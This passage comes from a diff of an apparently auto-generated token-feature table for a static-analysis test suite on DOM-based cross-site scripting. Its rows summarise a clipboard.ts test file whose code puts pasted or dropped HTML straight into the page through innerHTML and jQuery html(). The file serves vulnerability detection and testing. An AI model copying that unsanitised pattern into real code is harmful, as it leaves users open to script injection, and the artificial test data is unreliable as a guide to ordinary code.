e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | Array.f ... pItems) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | Array.f ... pItems) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:30:87:33 | from | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:30:87:33 | from | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:30:87:33 | from | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:30:87:33 | from | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:30:87:33 | from | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:87:35:87:43 | dropItems | CalleeFlexibleAccessPath | Array.from | | autogenerated/Xss/DomBasedXss/clipboard.ts:87:35:87:43 | dropItems | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:87:35:87:43 | dropItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12671,6 +95143,83 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:87:35:87:43 | dropItems | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:87:35:87:43 | dropItems | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:87:35:87:43 | dropItems | receiverName | Array | +| autogenerated/Xss/DomBasedXss/clipboard.ts:88:12:88:21 | imageItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:88:12:88:21 | imageItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:88:12:88:21 | imageItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:88:12:88:21 | imageItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:88:12:88:21 | imageItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:2 | (functi ... });\\n}) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:2 | (functi ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:2 | (functi ... });\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:4 | (functi ... );\\n})() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:4 | (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:4 | (functi ... );\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:4 | exceptional return of (functi ... );\\n})() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:4 | exceptional return of (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:1:101:4 | exceptional return of (functi ... );\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:92:1 | this | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:92:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:92:1 | this | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:92:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:92:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | 'arguments' object of anonymous function | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | exceptional return of anonymous function | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | functio ... });\\n} | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | functio ... });\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | functio ... });\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | return of anonymous function | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:92:2:101:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:11 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:11 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:11 | div | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:11 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:11 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div = d ... ("div") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div = d ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div = d ... ("div") | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div = d ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:9:93:43 | div = d ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:22 | document | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:22 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:22 | document | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:22 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:22 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:36 | documen ... Element | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:36 | documen ... Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:36 | documen ... Element | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:36 | documen ... Element | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:36 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | documen ... ("div") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | documen ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | documen ... ("div") | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | documen ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | documen ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | exceptional return of documen ... ("div") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | exceptional return of documen ... ("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | exceptional return of documen ... ("div") | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | exceptional return of documen ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:15:93:43 | exceptional return of documen ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:24:93:36 | createElement | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:24:93:36 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:24:93:36 | createElement | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:24:93:36 | createElement | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:93:24:93:36 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:93:38:93:42 | "div" | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/clipboard.ts:93:38:93:42 | "div" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:93:38:93:42 | "div" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12679,6 +95228,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:93:38:93:42 | "div" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:93:38:93:42 | "div" | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:93:38:93:42 | "div" | receiverName | document | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:7 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:7 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:7 | div | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:7 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:7 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:24 | div.addEventListener | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:24 | div.addEventListener | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:24 | div.addEventListener | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:24 | div.addEventListener | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:94:24 | div.addEventListener | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | div.add ... \\n }) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | div.add ... \\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | div.add ... \\n }) | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | div.add ... \\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | div.add ... \\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | exceptional return of div.add ... \\n }) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | exceptional return of div.add ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | exceptional return of div.add ... \\n }) | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | exceptional return of div.add ... \\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:5:100:6 | exceptional return of div.add ... \\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:9:94:24 | addEventListener | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:9:94:24 | addEventListener | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:9:94:24 | addEventListener | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:9:94:24 | addEventListener | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:9:94:24 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:26:94:38 | "beforeinput" | CalleeFlexibleAccessPath | div.addEventListener | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:26:94:38 | "beforeinput" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:26:94:38 | "beforeinput" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12687,6 +95261,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:94:26:94:38 | "beforeinput" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:26:94:38 | "beforeinput" | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:26:94:38 | "beforeinput" | receiverName | div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:94:40 | this | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:94:40 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:94:40 | this | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:94:40 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:94:40 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | 'arguments' object of anonymous function | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | exceptional return of anonymous function | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | exceptional return of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | functio ... K\\n } | CalleeFlexibleAccessPath | div.addEventListener | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | functio ... K\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | functio ... K\\n } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12695,11 +95284,176 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | functio ... K\\n } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | functio ... K\\n } | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | functio ... K\\n } | receiverName | div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | return of anonymous function | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:41:100:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:94:51:94:51 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:60 | { data, ... nsfer } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:60 | { data, ... nsfer } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:60 | { data, ... nsfer } | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:60 | { data, ... nsfer } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:60 | { data, ... nsfer } | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | { data, ... r } = e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | { data, ... r } = e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | { data, ... r } = e | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | { data, ... r } = e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:15:95:64 | { data, ... r } = e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | 